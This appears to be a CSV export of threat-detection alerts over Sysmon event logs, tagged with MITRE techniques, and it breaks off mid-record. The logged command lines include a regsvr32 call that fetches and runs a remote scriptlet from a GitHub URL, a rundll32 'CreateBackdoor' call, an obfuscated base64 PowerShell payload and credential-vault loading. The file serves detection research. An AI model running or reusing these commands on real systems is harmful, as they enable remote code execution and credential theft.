[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17287</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
<Data Name=""LogonId"">0x1341d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17287</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
<Data Name=""LogonId"">0x1341d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
</TimeCreated>
<EventRecordID>5275</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
<Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
</TimeCreated>
<EventRecordID>5275</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
<Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
</TimeCreated>
<EventRecordID>5275</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
<Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppools /text:name ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.110469Z"">
</TimeCreated>
<EventRecordID>5880</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.070</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010575CFF00</Data>
<Data Name=""ProcessId"">2644</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppools /text:name</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:14.871968Z"">
</TimeCreated>
<EventRecordID>23</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:14.781</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17286</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.482</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-0010EE150C00</Data>
<Data Name=""ProcessId"">2372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-0020DE330100</Data>
<Data Name=""LogonId"">0x133de</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
</TimeCreated>
<EventRecordID>243547</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
<Data Name=""ProcessId"">6400</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:14.871968Z"">
</TimeCreated>
<EventRecordID>23</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
